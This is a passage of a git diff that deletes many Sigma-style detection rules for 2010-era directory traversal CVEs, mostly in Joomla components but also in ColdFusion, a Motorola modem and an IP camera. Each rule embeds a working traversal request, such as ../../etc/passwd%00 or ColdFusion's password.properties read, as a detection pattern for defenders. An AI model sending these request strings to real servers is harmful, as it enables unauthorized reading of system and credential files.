-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-1306_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1306_exploitation_attempt.yaml
deleted file mode 100644
index 8cead1aa..00000000
--- a/rules/web/web_cve_CVE-2010-1306_exploitation_attempt.yaml
+++ /dev/null
@@ -1,23 +0,0 @@
-title: CVE-2010-1306 exploitation attempt
-id: b2105629-bb00-47a1-a01e-24147433710c
-author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component
- 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files
- via a .. (dot dot) in the controller parameter to index.php.
-references:
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-1314_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1314_exploitation_attempt.yaml
deleted file mode 100644
index 6e4902b2..00000000
--- a/rules/web/web_cve_CVE-2010-1314_exploitation_attempt.yaml
+++ /dev/null
@@ -1,23 +0,0 @@
-title: CVE-2010-1314 exploitation attempt
-id: 532cef3e-f3cc-437d-b6da-146675cb61ac
-author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the Highslide JS (com_hsconfig)
- component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files
- via a .. (dot dot) in the controller parameter to index.php.
-references:
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-1345_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1345_exploitation_attempt.yaml
deleted file mode 100644
index 1286b44e..00000000
--- a/rules/web/web_cve_CVE-2010-1345_exploitation_attempt.yaml
+++ /dev/null
@@ -1,23 +0,0 @@
-title: CVE-2010-1345 exploitation attempt
-id: 8869cdca-39da-496a-ba9c-c9eeb5c51a4c
-author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms)
- component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via
- a .. (dot dot) in the controller parameter to index.php.
-references:
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-1353_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1353_exploitation_attempt.yaml
deleted file mode 100644
index 206da49b..00000000
--- a/rules/web/web_cve_CVE-2010-1353_exploitation_attempt.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-title: CVE-2010-1353 exploitation attempt
-id: e464164c-0cb6-427f-9eea-06dbf29d3044
-author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the LoginBox Pro (com_loginbox)
- component for Joomla! allows remote attackers to read arbitrary files via a .. (dot
- dot) in the view parameter to index.php.
-references:
-- https://www.exploit-db.com/exploits/12068
-- https://www.cvedetails.com/cve/CVE-2010-1353
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-1474_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1474_exploitation_attempt.yaml
deleted file mode 100644
index 29e32c32..00000000
--- a/rules/web/web_cve_CVE-2010-1474_exploitation_attempt.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-title: CVE-2010-1474 exploitation attempt
-id: 4964f728-0184-4efb-b8b1-23087da5baab
-author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper)
- component 1.5.x for Joomla! allows remote attackers to read arbitrary files and
- possibly have unspecified other impact via a .. (dot dot) in the controller parameter
- to index.php.
-references:
-- https://www.exploit-db.com/exploits/12182
-- https://www.cvedetails.com/cve/CVE-2010-1474
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-1475_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1475_exploitation_attempt.yaml
deleted file mode 100644
index 50fbb166..00000000
--- a/rules/web/web_cve_CVE-2010-1475_exploitation_attempt.yaml
+++ /dev/null
@@ -1,24 +0,0 @@
-title: CVE-2010-1475 exploitation attempt
-id: 5f4ba4e9-6b51-4284-afdf-15485b08088f
-author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the Preventive & Reservation (com_preventive)
- component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and
- possibly have unspecified other impact via a .. (dot dot) in the controller parameter
- to index.php.
-references:
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-1495_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1495_exploitation_attempt.yaml
deleted file mode 100644
index 3f165d2a..00000000
--- a/rules/web/web_cve_CVE-2010-1495_exploitation_attempt.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-title: CVE-2010-1495 exploitation attempt
-id: 24ffa234-2963-4518-b72d-7aae991d1189
-author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the Matamko (com_matamko) component
- 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot)
- in the controller parameter to index.php.
-references:
-- https://www.exploit-db.com/exploits/12286
-- https://www.cvedetails.com/cve/CVE-2010-1495
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-1532_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1532_exploitation_attempt.yaml
deleted file mode 100644
index 295628c1..00000000
--- a/rules/web/web_cve_CVE-2010-1532_exploitation_attempt.yaml
+++ /dev/null
@@ -1,24 +0,0 @@
-title: CVE-2010-1532 exploitation attempt
-id: d65086e6-88a4-45e5-bc99-b1695aff4bd7
-author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the givesight PowerMail Pro (com_powermail)
- component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and
- possibly have unspecified other impact via a .. (dot dot) in the controller parameter
- to index.php.
-references:
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-1533_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1533_exploitation_attempt.yaml
deleted file mode 100644
index 17821b03..00000000
--- a/rules/web/web_cve_CVE-2010-1533_exploitation_attempt.yaml
+++ /dev/null
@@ -1,23 +0,0 @@
-title: CVE-2010-1533 exploitation attempt
-id: ad63c834-1072-4c2d-b246-f615557b3026
-author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the TweetLA (com_tweetla) component
- 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot
- dot) in the controller parameter to index.php.
-references:
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-1535_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1535_exploitation_attempt.yaml
deleted file mode 100644
index 38236528..00000000
--- a/rules/web/web_cve_CVE-2010-1535_exploitation_attempt.yaml
+++ /dev/null
@@ -1,24 +0,0 @@
-title: CVE-2010-1535 exploitation attempt
-id: b0962f54-4cfd-4059-b742-af6f4e82e8b2
-author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the TRAVELbook (com_travelbook)
- component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and
- possibly have unspecified other impact via a .. (dot dot) in the controller parameter
- to index.php.
-references:
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-1602_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1602_exploitation_attempt.yaml
deleted file mode 100644
index 2c2df33e..00000000
--- a/rules/web/web_cve_CVE-2010-1602_exploitation_attempt.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-title: CVE-2010-1602 exploitation attempt
-id: fdf12606-2a8a-4450-b3b7-e6bdf03e7096
-author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the ZiMB Comment (com_zimbcomment)
- component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and
- possibly have unspecified other impact via a .. (dot dot) in the controller parameter
- to index.php.
-references:
-- https://www.exploit-db.com/exploits/12283
-- https://www.cvedetails.com/cve/CVE-2010-1602
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-1657_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1657_exploitation_attempt.yaml
deleted file mode 100644
index 74080bca..00000000
--- a/rules/web/web_cve_CVE-2010-1657_exploitation_attempt.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-title: CVE-2010-1657 exploitation attempt
-id: 41364f89-94ca-464d-8ab4-0c1348656707
-author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the SmartSite (com_smartsite) component
- 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot
- dot) in the controller parameter to index.php.
-references:
-- https://www.exploit-db.com/exploits/12428
-- https://www.cvedetails.com/cve/CVE-2010-1657
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-1718_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1718_exploitation_attempt.yaml
deleted file mode 100644
index 87d7b66a..00000000
--- a/rules/web/web_cve_CVE-2010-1718_exploitation_attempt.yaml
+++ /dev/null
@@ -1,24 +0,0 @@
-title: CVE-2010-1718 exploitation attempt
-id: 14f01fca-dec5-4144-a40c-63488767b57f
-author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in archeryscores.php in the Archery
- Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to
- include and execute arbitrary local files via a .. (dot dot) in the controller parameter
- to index.php.
-references:
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-1722_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1722_exploitation_attempt.yaml
deleted file mode 100644
index eff64809..00000000
--- a/rules/web/web_cve_CVE-2010-1722_exploitation_attempt.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-title: CVE-2010-1722 exploitation attempt
-id: d1b8ce75-b746-48a9-ad5c-4d692f5a21a0
-author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the Online Market (com_market) component
- 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have
- unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
-references:
-- https://www.exploit-db.com/exploits/12177
-- https://www.cvedetails.com/cve/CVE-2010-1722
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-1875_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1875_exploitation_attempt.yaml
deleted file mode 100644
index 356a6f8a..00000000
--- a/rules/web/web_cve_CVE-2010-1875_exploitation_attempt.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-title: CVE-2010-1875 exploitation attempt
-id: 9fec2f12-8d56-4b94-8140-be92319e6282
-author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the Real Estate Property (com_properties)
- component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files
- and possibly have unspecified other impact via a .. (dot dot) in the controller
- parameter to index.php.
-references:
-- https://www.exploit-db.com/exploits/11851
-- https://www.cvedetails.com/cve/CVE-2010-1875
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-1953_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1953_exploitation_attempt.yaml
deleted file mode 100644
index cdcf71d5..00000000
--- a/rules/web/web_cve_CVE-2010-1953_exploitation_attempt.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-title: CVE-2010-1953 exploitation attempt
-id: b83f9267-f61a-4a52-a39c-2244330665c8
-author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap)
- component 1.0 for Joomla! allows remote attackers to read arbitrary files via a
- .. (dot dot) in the controller parameter to index.php.
-references:
-- https://www.exploit-db.com/exploits/12288
-- https://www.cvedetails.com/cve/CVE-2010-1953
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-1954_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1954_exploitation_attempt.yaml
deleted file mode 100644
index 4430f4fb..00000000
--- a/rules/web/web_cve_CVE-2010-1954_exploitation_attempt.yaml
+++ /dev/null
@@ -1,23 +0,0 @@
-title: CVE-2010-1954 exploitation attempt
-id: e15b002d-bfad-4ae6-8253-5c5e1d3d7c61
-author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot)
- component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files
- via a .. (dot dot) in the controller parameter to index.php.
-references:
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-1955_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1955_exploitation_attempt.yaml
deleted file mode 100644
index 6204191c..00000000
--- a/rules/web/web_cve_CVE-2010-1955_exploitation_attempt.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-title: CVE-2010-1955 exploitation attempt
-id: e5ac823c-60fa-40c5-b7b2-965e023d3747
-author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory)
- component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via
- a .. (dot dot) in the controller parameter to index.php.
-references:
-- https://www.exploit-db.com/exploits/12238
-- https://www.cvedetails.com/cve/CVE-2010-1955
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-1979_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1979_exploitation_attempt.yaml
deleted file mode 100644
index ee9852f8..00000000
--- a/rules/web/web_cve_CVE-2010-1979_exploitation_attempt.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-title: CVE-2010-1979 exploitation attempt
-id: 62b49fe0-8735-4c00-ac45-52ac7b673174
-author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds)
- component build 880 for Joomla! allows remote attackers to read arbitrary files
- via a .. (dot dot) in the controller parameter to index.php.
-references:
-- https://www.exploit-db.com/exploits/12088
-- https://www.cvedetails.com/cve/CVE-2010-1979
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-1983_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1983_exploitation_attempt.yaml
deleted file mode 100644
index 2d32c405..00000000
--- a/rules/web/web_cve_CVE-2010-1983_exploitation_attempt.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-title: CVE-2010-1983 exploitation attempt
-id: 7325d138-af8e-42a1-80eb-a6b69c32da79
-author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the redTWITTER (com_redtwitter)
- component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary
- files via a .. (dot dot) in the view parameter to index.php
-references:
-- https://www.exploit-db.com/exploits/12055
-- https://www.cvedetails.com/cve/CVE-2010-1983
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-2033_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-2033_exploitation_attempt.yaml
deleted file mode 100644
index 171ec24e..00000000
--- a/rules/web/web_cve_CVE-2010-2033_exploitation_attempt.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-title: CVE-2010-2033 exploitation attempt
-id: 2d38d9d5-b9a3-46dd-8f55-81c5961c21b2
-author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach)
- component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly
- have unspecified other impact via a .. (dot dot) in the controller parameter to
- index.php.
-references:
-- https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html
-- https://www.cvedetails.com/cve/CVE-2010-2033
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-2036_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-2036_exploitation_attempt.yaml
deleted file mode 100644
index 06d0b88e..00000000
--- a/rules/web/web_cve_CVE-2010-2036_exploitation_attempt.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-title: CVE-2010-2036 exploitation attempt
-id: ae8ea246-0ec4-48ed-96b1-e6ad8a8a0274
-author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach)
- component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly
- have unspecified other impact via a .. (dot dot) in the controller parameter to
- index.php.
-references:
-- https://www.exploit-db.com/exploits/34004
-- https://www.cvedetails.com/cve/CVE-2010-2036
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-2259_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-2259_exploitation_attempt.yaml
deleted file mode 100644
index 3609a834..00000000
--- a/rules/web/web_cve_CVE-2010-2259_exploitation_attempt.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-title: CVE-2010-2259 exploitation attempt
-id: a64bc24c-39fc-4531-b0c3-9d26f439f246
-author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component
- for Joomla! allows remote attackers to include and execute arbitrary local files
- via a .. (dot dot) in the controller parameter to index.php.
-references:
-- https://www.exploit-db.com/exploits/10946
-- https://www.cvedetails.com/cve/CVE-2010-2259
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-2307_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-2307_exploitation_attempt.yaml
deleted file mode 100644
index 600ebee3..00000000
--- a/rules/web/web_cve_CVE-2010-2307_exploitation_attempt.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-title: CVE-2010-2307 exploitation attempt
-id: 4d1124ea-beb9-4b9a-b75b-a76f61236a67
-author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Multiple directory traversal vulnerabilities in the web server for Motorola
- SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow
- remote attackers to read arbitrary files via (1) "//" (multiple leading slash),
- (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request.
-references:
-- https://www.securityfocus.com/bid/40550/info
-- https://nvd.nist.gov/vuln/detail/CVE-2010-2307
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /../../etc/passwd
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-2682_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-2682_exploitation_attempt.yaml
deleted file mode 100644
index 94fcbdbc..00000000
--- a/rules/web/web_cve_CVE-2010-2682_exploitation_attempt.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-title: CVE-2010-2682 exploitation attempt
-id: c190dd5f-7b3c-4184-bca0-94129a1a0cdb
-author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna)
- component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and
- possibly have unspecified other impact via a .. (dot dot) in the controller parameter
- to index.php.
-references:
-- https://www.exploit-db.com/exploits/14017
-- https://www.cvedetails.com/cve/CVE-2010-2682
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-2861_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-2861_exploitation_attempt.yaml
deleted file mode 100644
index 6513ed68..00000000
--- a/rules/web/web_cve_CVE-2010-2861_exploitation_attempt.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-title: CVE-2010-2861 exploitation attempt
-id: d98ff4e9-b11e-40b7-a536-b71bd1800042
-author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Multiple directory traversal vulnerabilities in the administrator console
- in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files
- via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm,
- (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm
- in CFIDE/administrator/.
-references:
-- https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861
-- http://www.adobe.com/support/security/bulletins/apsb10-18.html
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-3426_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-3426_exploitation_attempt.yaml
deleted file mode 100644
index 8d50a3c8..00000000
--- a/rules/web/web_cve_CVE-2010-3426_exploitation_attempt.yaml
+++ /dev/null
@@ -1,23 +0,0 @@
-title: CVE-2010-3426 exploitation attempt
-id: 3178d248-aa37-4f7c-97ee-3c16809bca69
-author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in jphone.php in the JPhone (com_jphone)
- component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute
- arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
-references:
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
diff --git a/rules/web/web_cve_CVE-2010-4231_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-4231_exploitation_attempt.yaml
deleted file mode 100644
index e8a4bb98..00000000
--- a/rules/web/web_cve_CVE-2010-4231_exploitation_attempt.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-title: CVE-2010-4231 exploitation attempt
-id: 52c315b8-c56e-41b9-ace4-fdfdc593657d
-author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: The CMNC-200 IP Camera has a built-in web server that is enabled by default.
- The server is vulnerable to directory transversal attacks, allowing access to any
- file on the camera file system.
